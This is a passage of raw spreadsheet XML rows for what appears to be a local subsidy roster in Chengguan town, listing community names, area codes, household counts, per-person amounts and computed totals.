      <c r="D765" s="24" t="s">
        <v>2066</v>
      </c>
      <c r="E765" s="24" t="s">
        <v>2067</v>
      </c>
      <c r="F765" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G765" s="24">
        <v>2</v>
      </c>
      <c r="H765" s="25">
        <v>325</v>
      </c>
      <c r="I765" s="24">
        <f t="shared" si="11"/>
        <v>650</v>
      </c>
      <c r="J765" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K765" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="766" customFormat="1" customHeight="1" spans="1:12">
      <c r="A766" s="23" t="s">
        <v>2068</v>
      </c>
      <c r="B766" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C766" s="27" t="s">
        <v>2032</v>
      </c>
      <c r="D766" s="38" t="s">
        <v>2069</v>
      </c>
      <c r="E766" s="38" t="s">
        <v>2070</v>
      </c>
      <c r="F766" s="27" t="s">
        <v>233</v>
      </c>
      <c r="G766" s="38"/>
      <c r="H766" s="39"/>
      <c r="I766" s="24">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="J766" s="40" t="s">
        <v>2071</v>
      </c>
      <c r="K766" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L766" s="8"/>
    </row>
    <row r="767" customHeight="1" spans="1:12">
      <c r="A767" s="23" t="s">
        <v>2072</v>
      </c>
      <c r="B767" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C767" s="24" t="s">
        <v>1778</v>
      </c>
      <c r="D767" s="24" t="s">
        <v>2073</v>
      </c>
      <c r="E767" s="24" t="s">
        <v>2074</v>
      </c>
      <c r="F767" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G767" s="24">
        <v>1</v>
      </c>
      <c r="H767" s="25">
        <v>365</v>
      </c>
      <c r="I767" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J767" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K767" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="768" customHeight="1" spans="1:12">
      <c r="A768" s="23" t="s">
        <v>2075</v>
      </c>
      <c r="B768" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C768" s="24" t="s">
        <v>2051</v>
      </c>
      <c r="D768" s="24" t="s">
        <v>2076</v>
      </c>
      <c r="E768" s="24" t="s">
        <v>915</v>
      </c>
      <c r="F768" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G768" s="24">
        <v>2</v>
      </c>
      <c r="H768" s="25">
        <v>325</v>
      </c>
      <c r="I768" s="24">
        <f t="shared" si="11"/>
        <v>650</v>
      </c>
      <c r="J768" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K768" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="769" customHeight="1" spans="1:11">
      <c r="A769" s="23" t="s">
        <v>2077</v>
      </c>
      <c r="B769" s="24" t="str">
        <f>B768</f>
        <v>城关镇</v>
      </c>
      <c r="C769" s="24" t="str">
        <f>C768</f>
        <v>西北社区</v>
      </c>
      <c r="D769" s="36" t="s">
        <v>2078</v>
      </c>
      <c r="E769" s="36" t="s">
        <v>288</v>
      </c>
      <c r="F769" s="24" t="str">
        <f>F768</f>
        <v>4113210106</v>
      </c>
      <c r="G769" s="24"/>
      <c r="H769" s="24"/>
      <c r="I769" s="24">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="J769" s="24"/>
      <c r="K769" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="770" customHeight="1" spans="1:11">
      <c r="A770" s="23" t="s">
        <v>2079</v>
      </c>
      <c r="B770" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C770" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D770" s="24" t="s">
        <v>2080</v>
      </c>
      <c r="E770" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F770" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G770" s="24">
        <v>1</v>
      </c>
      <c r="H770" s="25">
        <v>365</v>
      </c>
      <c r="I770" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J770" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K770" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="771" customHeight="1" spans="1:11">
      <c r="A771" s="23" t="s">
        <v>2081</v>
      </c>
      <c r="B771" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C771" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D771" s="24" t="s">
        <v>2082</v>
      </c>
      <c r="E771" s="24" t="s">
        <v>578</v>
      </c>
      <c r="F771" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G771" s="24">
        <v>1</v>
      </c>
      <c r="H771" s="25">
        <v>365</v>
      </c>
      <c r="I771" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J771" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K771" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="772" customHeight="1" spans="1:11">
      <c r="A772" s="23" t="s">
        <v>2083</v>
      </c>
      <c r="B772" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C772" s="24" t="s">
        <v>2084</v>
      </c>
      <c r="D772" s="24" t="s">
        <v>2085</v>
      </c>
      <c r="E772" s="24" t="s">
        <v>2086</v>
      </c>
      <c r="F772" s="24" t="s">
        <v>1203</v>
      </c>
      <c r="G772" s="24">
        <v>1</v>
      </c>
      <c r="H772" s="25">
        <v>365</v>
      </c>
      <c r="I772" s="24">
        <f t="shared" ref="I772:I835" si="12">H772*G772</f>
        <v>365</v>
      </c>
      <c r="J772" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K772" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="773" customHeight="1" spans="1:11">
      <c r="A773" s="23" t="s">
        <v>2087</v>
      </c>
      <c r="B773" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C773" s="24" t="s">
        <v>2051</v>
      </c>
      <c r="D773" s="24" t="s">
        <v>2088</v>
      </c>
      <c r="E773" s="24" t="s">
        <v>2089</v>
      </c>
      <c r="F773" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G773" s="24">
        <v>1</v>
      </c>
      <c r="H773" s="25">
        <v>365</v>
      </c>
      <c r="I773" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J773" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K773" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="774" customHeight="1" spans="1:11">
      <c r="A774" s="23" t="s">
        <v>2090</v>
      </c>
      <c r="B774" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C774" s="24" t="s">
        <v>2035</v>
      </c>
      <c r="D774" s="24" t="s">
        <v>2091</v>
      </c>
      <c r="E774" s="24" t="s">
        <v>697</v>
      </c>
      <c r="F774" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G774" s="24">
        <v>1</v>
      </c>
      <c r="H774" s="25">
        <v>365</v>
      </c>
      <c r="I774" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J774" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K774" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="775" customHeight="1" spans="1:11">
      <c r="A775" s="23" t="s">
        <v>2092</v>
      </c>
      <c r="B775" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C775" s="24" t="s">
        <v>2035</v>
      </c>
      <c r="D775" s="24" t="s">
        <v>2093</v>
      </c>
      <c r="E775" s="24" t="s">
        <v>432</v>
      </c>
      <c r="F775" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G775" s="24">
        <v>1</v>
      </c>
      <c r="H775" s="25">
        <v>365</v>
      </c>
      <c r="I775" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J775" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K775" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="776" customHeight="1" spans="1:11">
      <c r="A776" s="23" t="s">
        <v>2094</v>
      </c>
      <c r="B776" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C776" s="24" t="s">
        <v>219</v>
      </c>
      <c r="D776" s="24" t="s">
        <v>2095</v>
      </c>
      <c r="E776" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F776" s="24" t="s">
        <v>1203</v>
      </c>
      <c r="G776" s="24">
        <v>1</v>
      </c>
      <c r="H776" s="25">
        <v>365</v>
      </c>
      <c r="I776" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J776" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K776" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="777" customHeight="1" spans="1:11">
      <c r="A777" s="23" t="s">
        <v>2096</v>
      </c>
      <c r="B777" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C777" s="24" t="s">
        <v>2097</v>
      </c>
      <c r="D777" s="24" t="s">
        <v>2098</v>
      </c>
      <c r="E777" s="24" t="s">
        <v>869</v>
      </c>
      <c r="F777" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G777" s="24">
        <v>1</v>
      </c>
      <c r="H777" s="25">
        <v>365</v>
      </c>
      <c r="I777" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J777" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K777" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="778" customHeight="1" spans="1:11">
      <c r="A778" s="23" t="s">
        <v>2099</v>
      </c>
      <c r="B778" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C778" s="24" t="s">
        <v>2097</v>
      </c>
      <c r="D778" s="24" t="s">
        <v>2100</v>
      </c>
      <c r="E778" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F778" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G778" s="24">
        <v>1</v>
      </c>
      <c r="H778" s="25">
        <v>365</v>
      </c>
      <c r="I778" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J778" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K778" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="779" customHeight="1" spans="1:11">
      <c r="A779" s="23" t="s">
        <v>2101</v>
      </c>
      <c r="B779" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C779" s="24" t="s">
        <v>2102</v>
      </c>
      <c r="D779" s="24" t="s">
        <v>2103</v>
      </c>
      <c r="E779" s="24" t="s">
        <v>258</v>
      </c>
      <c r="F779" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G779" s="24">
        <v>1</v>
      </c>
      <c r="H779" s="25">
        <v>365</v>
      </c>
      <c r="I779" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J779" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K779" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="780" customHeight="1" spans="1:11">
      <c r="A780" s="23" t="s">
        <v>2104</v>
      </c>
      <c r="B780" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C780" s="24" t="s">
        <v>2102</v>
      </c>
      <c r="D780" s="24" t="s">
        <v>2105</v>
      </c>
      <c r="E780" s="24" t="s">
        <v>2106</v>
      </c>
      <c r="F780" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G780" s="24">
        <v>1</v>
      </c>
      <c r="H780" s="25">
        <v>365</v>
      </c>
      <c r="I780" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J780" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K780" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="781" customHeight="1" spans="1:11">
      <c r="A781" s="23" t="s">
        <v>2107</v>
      </c>
      <c r="B781" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C781" s="24" t="s">
        <v>2102</v>
      </c>
      <c r="D781" s="24" t="s">
        <v>2108</v>
      </c>
      <c r="E781" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F781" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G781" s="24">
        <v>1</v>
      </c>
      <c r="H781" s="25">
        <v>365</v>
      </c>
      <c r="I781" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J781" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K781" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="782" customHeight="1" spans="1:11">
      <c r="A782" s="23" t="s">
        <v>2109</v>
      </c>
      <c r="B782" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C782" s="24" t="s">
        <v>1536</v>
      </c>
      <c r="D782" s="24" t="s">
        <v>2110</v>
      </c>
      <c r="E782" s="24" t="s">
        <v>2111</v>
      </c>
      <c r="F782" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G782" s="24">
        <v>1</v>
      </c>
      <c r="H782" s="25">
        <v>365</v>
      </c>
      <c r="I782" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J782" s="24">
        <v>45078</v>
      </c>
      <c r="K782" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="783" customHeight="1" spans="1:11">
      <c r="A783" s="23" t="s">
        <v>2112</v>
      </c>
      <c r="B783" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C783" s="24" t="s">
        <v>2097</v>
      </c>
      <c r="D783" s="24" t="s">
        <v>2113</v>
      </c>
      <c r="E783" s="24" t="s">
        <v>519</v>
      </c>
      <c r="F783" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G783" s="24">
        <v>1</v>
      </c>
      <c r="H783" s="25">
        <v>365</v>
      </c>
      <c r="I783" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J783" s="24">
        <v>45078</v>
      </c>
      <c r="K783" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="784" customHeight="1" spans="1:11">
      <c r="A784" s="23" t="s">
        <v>2114</v>
      </c>
      <c r="B784" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C784" s="24" t="s">
        <v>2029</v>
      </c>
      <c r="D784" s="24" t="s">
        <v>2115</v>
      </c>
      <c r="E784" s="24" t="s">
        <v>2116</v>
      </c>
      <c r="F784" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G784" s="24">
        <v>2</v>
      </c>
      <c r="H784" s="25">
        <v>325</v>
      </c>
      <c r="I784" s="24">
        <f t="shared" si="12"/>
        <v>650</v>
      </c>
      <c r="J784" s="24">
        <v>45078</v>
      </c>
      <c r="K784" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="785" customHeight="1" spans="1:11">
      <c r="A785" s="23" t="s">
        <v>2117</v>
      </c>
      <c r="B785" s="24" t="str">
        <f>B784</f>
        <v>城关镇</v>
      </c>
      <c r="C785" s="24" t="str">
        <f>C784</f>
        <v>城关镇东北社区</v>
      </c>
      <c r="D785" s="30" t="s">
        <v>2118</v>
      </c>
      <c r="E785" s="30" t="s">
        <v>2119</v>
      </c>
      <c r="F785" s="24" t="str">
        <f>F784</f>
        <v>4113210103</v>
      </c>
      <c r="G785" s="24"/>
      <c r="H785" s="24"/>
      <c r="I785" s="24">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="J785" s="24"/>
      <c r="K785" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="786" customHeight="1" spans="1:11">
      <c r="A786" s="23" t="s">
        <v>2120</v>
      </c>
      <c r="B786" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C786" s="24" t="s">
        <v>2102</v>
      </c>
      <c r="D786" s="24" t="s">
        <v>2121</v>
      </c>
      <c r="E786" s="24" t="s">
        <v>389</v>
      </c>
      <c r="F786" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G786" s="24">
        <v>1</v>
      </c>
      <c r="H786" s="25">
        <v>365</v>
      </c>
      <c r="I786" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J786" s="24">
        <v>45078</v>
      </c>
      <c r="K786" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="787" customHeight="1" spans="1:11">
      <c r="A787" s="23" t="s">
        <v>2122</v>
      </c>
      <c r="B787" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C787" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D787" s="24" t="s">
        <v>2123</v>
      </c>
      <c r="E787" s="24" t="s">
        <v>915</v>
      </c>
      <c r="F787" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G787" s="24">
        <v>1</v>
      </c>
      <c r="H787" s="25">
        <v>365</v>
      </c>
      <c r="I787" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J787" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K787" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="788" customHeight="1" spans="1:11">
      <c r="A788" s="23" t="s">
        <v>2124</v>
      </c>
      <c r="B788" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C788" s="24" t="s">
        <v>1683</v>
      </c>
      <c r="D788" s="24" t="s">
        <v>2125</v>
      </c>
      <c r="E788" s="24" t="s">
        <v>765</v>
      </c>
      <c r="F788" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G788" s="24">
        <v>1</v>
      </c>
      <c r="H788" s="25">
        <v>365</v>
      </c>
      <c r="I788" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J788" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K788" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="789" customHeight="1" spans="1:11">
      <c r="A789" s="23" t="s">
        <v>2126</v>
      </c>
      <c r="B789" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C789" s="24" t="s">
        <v>2127</v>
      </c>
      <c r="D789" s="24" t="s">
        <v>2128</v>
      </c>
      <c r="E789" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F789" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G789" s="24">
        <v>1</v>
      </c>
      <c r="H789" s="25">
        <v>365</v>
      </c>
      <c r="I789" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J789" s="41">
        <v>45108</v>
      </c>
      <c r="K789" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="790" customHeight="1" spans="1:11">
      <c r="A790" s="23" t="s">
        <v>2129</v>
      </c>
      <c r="B790" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C790" s="24" t="s">
        <v>2130</v>
      </c>
      <c r="D790" s="24" t="s">
        <v>2131</v>
      </c>
      <c r="E790" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F790" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G790" s="24">
        <v>1</v>
      </c>
      <c r="H790" s="25">
        <v>365</v>
      </c>
      <c r="I790" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J790" s="41">
        <v>45108</v>
      </c>
      <c r="K790" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="791" customHeight="1" spans="1:11">
      <c r="A791" s="23" t="s">
        <v>2132</v>
      </c>
      <c r="B791" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C791" s="24" t="s">
        <v>2133</v>
      </c>
      <c r="D791" s="24" t="s">
        <v>2134</v>
      </c>
      <c r="E791" s="24" t="s">
        <v>340</v>
      </c>
      <c r="F791" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G791" s="24">
        <v>1</v>
      </c>
      <c r="H791" s="25">
        <v>365</v>
      </c>
      <c r="I791" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J791" s="41">
        <v>45108</v>
      </c>
      <c r="K791" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="792" customHeight="1" spans="1:11">
      <c r="A792" s="23" t="s">
        <v>2135</v>
      </c>
      <c r="B792" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C792" s="24" t="s">
        <v>2136</v>
      </c>
      <c r="D792" s="24" t="s">
        <v>2137</v>
      </c>
      <c r="E792" s="24" t="s">
        <v>337</v>
      </c>
      <c r="F792" s="24" t="s">
        <v>1970</v>
      </c>
      <c r="G792" s="24">
        <v>2</v>
      </c>
      <c r="H792" s="25">
        <v>325</v>
      </c>
      <c r="I792" s="24">
        <f t="shared" si="12"/>
        <v>650</v>
      </c>
      <c r="J792" s="41">
        <v>45108</v>
      </c>
      <c r="K792" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="793" customHeight="1" spans="1:11">
      <c r="A793" s="23" t="s">
        <v>2138</v>
      </c>
      <c r="B793" s="24" t="str">
        <f>B792</f>
        <v>城关镇</v>
      </c>
      <c r="C793" s="24" t="str">
        <f>C792</f>
        <v>南外社区中医院</v>
      </c>
      <c r="D793" s="30" t="s">
        <v>2139</v>
      </c>
      <c r="E793" s="30" t="s">
        <v>416</v>
      </c>
      <c r="F793" s="24" t="str">
        <f>F792</f>
        <v>4113210104</v>
      </c>
      <c r="G793" s="24"/>
      <c r="H793" s="24"/>
      <c r="I793" s="24">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="J793" s="41"/>
      <c r="K793" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="794" customHeight="1" spans="1:11">
      <c r="A794" s="23" t="s">
        <v>2140</v>
      </c>
      <c r="B794" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C794" s="24" t="s">
        <v>2141</v>
      </c>
      <c r="D794" s="24" t="s">
        <v>2142</v>
      </c>
      <c r="E794" s="24" t="s">
        <v>1689</v>
      </c>
      <c r="F794" s="24" t="s">
        <v>1970</v>
      </c>
      <c r="G794" s="24">
        <v>3</v>
      </c>
      <c r="H794" s="25">
        <v>290</v>
      </c>
      <c r="I794" s="24">
        <f t="shared" si="12"/>
        <v>870</v>
      </c>
      <c r="J794" s="41">
        <v>45108</v>
      </c>
      <c r="K794" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="795" customHeight="1" spans="1:11">
      <c r="A795" s="23" t="s">
        <v>2143</v>
      </c>
      <c r="B795" s="24" t="str">
        <f>B794</f>
        <v>城关镇</v>
      </c>
      <c r="C795" s="24" t="str">
        <f>C794</f>
        <v>南外社区印刷厂</v>
      </c>
      <c r="D795" s="23" t="s">
        <v>2144</v>
      </c>
      <c r="E795" s="23" t="s">
        <v>2145</v>
      </c>
      <c r="F795" s="24" t="str">
        <f>F794</f>
        <v>4113210104</v>
      </c>
      <c r="G795" s="24"/>
      <c r="H795" s="24"/>
      <c r="I795" s="24">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="J795" s="41"/>
      <c r="K795" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="796" customHeight="1" spans="1:11">
      <c r="A796" s="23" t="s">
        <v>2146</v>
      </c>
      <c r="B796" s="24" t="str">
        <f>B795</f>
        <v>城关镇</v>
      </c>
      <c r="C796" s="24" t="str">
        <f>C795</f>
        <v>南外社区印刷厂</v>
      </c>
      <c r="D796" s="23" t="s">
        <v>2147</v>
      </c>
      <c r="E796" s="23" t="s">
        <v>2148</v>
      </c>
      <c r="F796" s="24" t="str">
        <f>F795</f>
        <v>4113210104</v>
      </c>
      <c r="G796" s="24"/>
      <c r="H796" s="24"/>
      <c r="I796" s="24">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="J796" s="41"/>
      <c r="K796" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="797" customHeight="1" spans="1:11">
      <c r="A797" s="23" t="s">
        <v>2149</v>
      </c>
      <c r="B797" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C797" s="24" t="s">
        <v>2141</v>
      </c>
      <c r="D797" s="24" t="s">
        <v>2150</v>
      </c>
      <c r="E797" s="24" t="s">
        <v>2151</v>
      </c>
      <c r="F797" s="24" t="s">
        <v>1970</v>
      </c>
      <c r="G797" s="24">
        <v>2</v>
      </c>
      <c r="H797" s="25">
        <v>325</v>
      </c>
      <c r="I797" s="24">
        <f t="shared" si="12"/>
        <v>650</v>
      </c>
      <c r="J797" s="41">
        <v>45108</v>
      </c>
      <c r="K797" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="798" customHeight="1" spans="1:11">
      <c r="A798" s="23" t="s">
        <v>2152</v>
      </c>
      <c r="B798" s="24" t="str">
        <f>B797</f>
        <v>城关镇</v>
      </c>
      <c r="C798" s="24" t="str">
        <f>C797</f>
        <v>南外社区印刷厂</v>
      </c>
      <c r="D798" s="30" t="s">
        <v>2153</v>
      </c>
      <c r="E798" s="30" t="s">
        <v>2154</v>
      </c>
      <c r="F798" s="24" t="str">
        <f>F797</f>
        <v>4113210104</v>
      </c>
      <c r="G798" s="24"/>
      <c r="H798" s="24"/>
      <c r="I798" s="24">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="J798" s="41"/>
      <c r="K798" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="799" customHeight="1" spans="1:11">
      <c r="A799" s="23" t="s">
        <v>2155</v>
      </c>
      <c r="B799" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C799" s="24" t="s">
        <v>2141</v>
      </c>
      <c r="D799" s="24" t="s">
        <v>2156</v>
      </c>
      <c r="E799" s="24" t="s">
        <v>2157</v>
      </c>
      <c r="F799" s="24" t="s">
        <v>1970</v>
      </c>
      <c r="G799" s="24">
        <v>1</v>
      </c>
      <c r="H799" s="25">
        <v>365</v>
      </c>
      <c r="I799" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J799" s="41">
        <v>45108</v>
      </c>
      <c r="K799" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="800" customHeight="1" spans="1:11">
      <c r="A800" s="23" t="s">
        <v>2158</v>
      </c>
      <c r="B800" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C800" s="24" t="s">
        <v>2159</v>
      </c>
      <c r="D800" s="24" t="s">
        <v>2160</v>
      </c>
      <c r="E800" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F800" s="24" t="s">
        <v>1970</v>
      </c>
      <c r="G800" s="24">
        <v>1</v>
      </c>
      <c r="H800" s="25">
        <v>365</v>
      </c>
      <c r="I800" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J800" s="41">
        <v>45108</v>
      </c>
      <c r="K800" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="801" customHeight="1" spans="1:11">
      <c r="A801" s="23" t="s">
        <v>2161</v>
      </c>
      <c r="B801" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C801" s="24" t="s">
        <v>2141</v>
      </c>
      <c r="D801" s="24" t="s">
        <v>2162</v>
      </c>
      <c r="E801" s="24" t="s">
        <v>2163</v>
      </c>
      <c r="F801" s="24" t="s">
        <v>1970</v>
      </c>
      <c r="G801" s="24">
        <v>1</v>
      </c>
      <c r="H801" s="25">
        <v>365</v>
      </c>
      <c r="I801" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J801" s="41">
        <v>45108</v>
      </c>
      <c r="K801" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="802" customHeight="1" spans="1:11">
      <c r="A802" s="23" t="s">
        <v>2164</v>
      </c>
      <c r="B802" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C802" s="24" t="s">
        <v>2165</v>
      </c>
      <c r="D802" s="24" t="s">
        <v>2166</v>
      </c>
      <c r="E802" s="24" t="s">
        <v>540</v>
      </c>
      <c r="F802" s="24" t="s">
        <v>1970</v>
      </c>
      <c r="G802" s="24">
        <v>1</v>
      </c>
      <c r="H802" s="25">
        <v>365</v>
      </c>
      <c r="I802" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J802" s="41">
        <v>45108</v>
      </c>
      <c r="K802" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="803" customHeight="1" spans="1:11">
      <c r="A803" s="23" t="s">
        <v>2167</v>
      </c>
      <c r="B803" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C803" s="24" t="s">
        <v>2168</v>
      </c>
      <c r="D803" s="24" t="s">
        <v>2169</v>
      </c>
      <c r="E803" s="24" t="s">
        <v>2170</v>
      </c>
      <c r="F803" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G803" s="24">
        <v>2</v>
      </c>
      <c r="H803" s="25">
        <v>325</v>
      </c>
      <c r="I803" s="24">
        <f t="shared" si="12"/>
        <v>650</v>
      </c>
      <c r="J803" s="41">
        <v>45108</v>
      </c>
      <c r="K803" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="804" customHeight="1" spans="1:11">
      <c r="A804" s="23" t="s">
        <v>2171</v>
      </c>
      <c r="B804" s="24" t="str">
        <f>B803</f>
        <v>城关镇</v>
      </c>
      <c r="C804" s="24" t="str">
        <f>C803</f>
        <v>西北社区商业中心</v>
      </c>
      <c r="D804" s="30" t="s">
        <v>2172</v>
      </c>
      <c r="E804" s="30" t="s">
        <v>519</v>
      </c>
      <c r="F804" s="24" t="str">
        <f>F803</f>
        <v>4113210106</v>
      </c>
      <c r="G804" s="24"/>
      <c r="H804" s="24"/>
      <c r="I804" s="24">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="J804" s="41"/>
      <c r="K804" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="805" customHeight="1" spans="1:11">
      <c r="A805" s="23" t="s">
        <v>2173</v>
      </c>
      <c r="B805" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C805" s="24" t="s">
        <v>2174</v>
      </c>
      <c r="D805" s="24" t="s">
        <v>2175</v>
      </c>
